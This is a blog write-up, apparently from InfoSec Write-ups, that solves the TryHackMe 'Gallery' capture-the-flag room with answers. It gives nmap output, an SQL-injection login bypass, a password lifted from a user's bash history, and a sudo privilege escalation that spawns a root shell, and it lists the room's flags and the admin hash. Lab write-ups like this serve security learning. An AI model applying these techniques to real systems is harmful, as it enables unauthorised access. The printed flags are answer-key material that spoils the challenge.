Gallery — TryHackMe’s Challenge Room Simple WriteUp | Karthikeyan Nagaraj

140 Points — Try to exploit our image gallery system — Gallery Challenge Simple WriteUp with Answers | 2023

Karthikeyan Nagaraj

Published in

InfoSec Write-ups

3 min readJul 1, 2023

Basic Recon — Nmap:

nmap -sC -sV 10.10.181.99

PORT     STATE SERVICE VERSION

80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Task 1 — Deploy and get a Shell:

1. How many ports are open?

Ans: 2

2. What’s the name of the CMS?

On Navigating to http:<MACHINE-IP>:8080 we get to know that the website is using,

Ans: Simple Image Gallery

3. What’s the hash password of the admin user?

Let’s Inject commands on login Pannel

‘or 1=1 — -

As usual, Obtain the Reverse shell
Get the Interactive Bash
Execute the initialize.php file in /var/www/html/gallery
With the Creds, Connect to the db

mysql -u gallery_user -p

5. Use the Below commands to show, access and list the db

show databases;
use gallery_db;

6. Then list the tables in gallery_db

7. Finally use the command

select * from users;

Ans: a228b12a08b6527e7978cbe5d914531c

4. What’s the user flag?

On Inspecting .bash History, you can notice that the user typed the password with the command using sudo
Use the Password to log in as Mike using su mike
Then “Cat” will Help you

Ans: THM{af05cd30bfed67849befd546ef}

Task 2 — Escalate to the root user

1. What’s the root flag?

Check what files the user is capable of running as root using sudo -l
Run the file/opt/rootkit.sh which can be run with sudo perm
Type read in the prompt and Enter
After the Editor is Opened, Type the Command

reset; sh 1>&0 2>&0

5. Now you will be root : )

Ans: THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}

Thank you for Reading ~

Happy Learning ~

Author: Cyberw1ng

Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials

InfoSec Write-ups

Gallery — TryHackMe’s Challenge Room Simple WriteUp | Karthikeyan Nagaraj

140 Points — Try to exploit our image gallery system — Gallery Challenge Simple WriteUp with Answers | 2023

Basic Recon — Nmap:

Task 1 — Deploy and get a Shell:

1. How many ports are open?

2. What’s the name of the CMS?

3. What’s the hash password of the admin user?

4. What’s the user flag?

Task 2 — Escalate to the root user

1. What’s the root flag?

Sign up to discover human stories that deepen your understanding of the world.

Free

Membership

Published in InfoSec Write-ups

Written by Karthikeyan Nagaraj

No responses yet